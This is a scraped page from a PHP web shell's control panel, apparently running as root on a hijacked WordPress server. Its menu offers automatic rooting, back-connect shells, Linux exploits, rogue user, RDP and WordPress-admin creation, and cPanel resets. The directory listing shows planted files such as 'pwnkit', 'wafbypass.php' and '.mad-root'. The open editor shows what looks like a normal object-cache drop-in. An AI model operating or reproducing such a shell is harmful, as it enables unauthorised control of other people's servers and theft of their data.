Linux 4e23370b81f1 5.14.0-687.5.3.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 14:53:22 EDT 2026 x86_64
: 127.0.0.1 | : 216.73.217.70
Cant Read [ /etc/named.conf ]
8.3.31
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
dom1153719 /
wp-content /
[ HOME SHELL ]
Name
Size
Permission
Action
et-cache
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
mu-plugins
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
themes
[ DIR ]
drwxrwxr-x
upgrade
[ DIR ]
drwxrwxr-x
upgrade-temp-backup
[ DIR ]
drwxrwxr-x
uploads
[ DIR ]
drwxrwxr-x
wpaas-updates-log
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-rw-r--
09313.php
14.89
KB
-rw-rw-r--
a7a84.php
14.89
KB
-rw-rw-r--
adminer.php
465.43
KB
-rw-rw-r--
db-error.php
0
B
-rw-rw-r--
debug_log.txt
6.27
KB
-rw-rw-r--
index.php
0
B
-r--r--r--
object-assets.php
0
B
-rw-rw-r--
object-cache.php
1.83
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-rw-r--
wafbypass.php
0
B
-rw-rw-r--
ziro.php
195.56
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : object-cache.php
<?php /* * Plugin Name: Object Cache Pro (Drop-in) * Plugin URI: https://objectcache.pro * Description: A business class Redis object cache backend for WordPress. * Version: 1.25.5 * Author: Rhubarb Group * Author URI: https://rhubarb.group * License: Proprietary * Requires PHP: 7.2 */ defined('ABSPATH') || exit; if (version_compare(PHP_VERSION, '7.2', '<')) { return require_once ABSPATH . WPINC . '/cache.php'; } if (defined('WP_SETUP_CONFIG')) { return require_once ABSPATH . WPINC . '/cache.php'; } if (defined('WP_REDIS_DISABLED') && WP_REDIS_DISABLED) { return; } if (! empty(getenv('WP_REDIS_DISABLED'))) { return; } foreach ([ defined('WP_REDIS_DIR') ? WP_REDIS_DIR : null, // Redis Cache Pro defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR . '/redis-cache-pro' : null, defined('WP_CONTENT_DIR') ? WP_CONTENT_DIR . '/mu-plugins/redis-cache-pro' : null, defined('WP_PLUGIN_DIR') ? WP_PLUGIN_DIR . '/redis-cache-pro' : null, defined('WP_CONTENT_DIR') ? WP_CONTENT_DIR . '/plugins/redis-cache-pro' : null, // Object Cache Pro defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR . '/object-cache-pro' : null, defined('WP_CONTENT_DIR') ? WP_CONTENT_DIR . '/mu-plugins/object-cache-pro' : null, defined('WP_PLUGIN_DIR') ? WP_PLUGIN_DIR . '/object-cache-pro' : null, defined('WP_CONTENT_DIR') ? WP_CONTENT_DIR . '/plugins/object-cache-pro' : null, ] as $path) { if ($path === null || ! is_readable("{$path}/api.php")) { continue; } if (include_once "{$path}/api.php") { return true; } } error_log('objectcache.critical: Failed to locate and load object cache API'); $GLOBALS['wp_object_cache_errors'] = ['Failed to locate and load object cache API']; if (defined('WP_DEBUG') && WP_DEBUG) { throw new RuntimeException('Failed to locate and load object cache API'); }
Close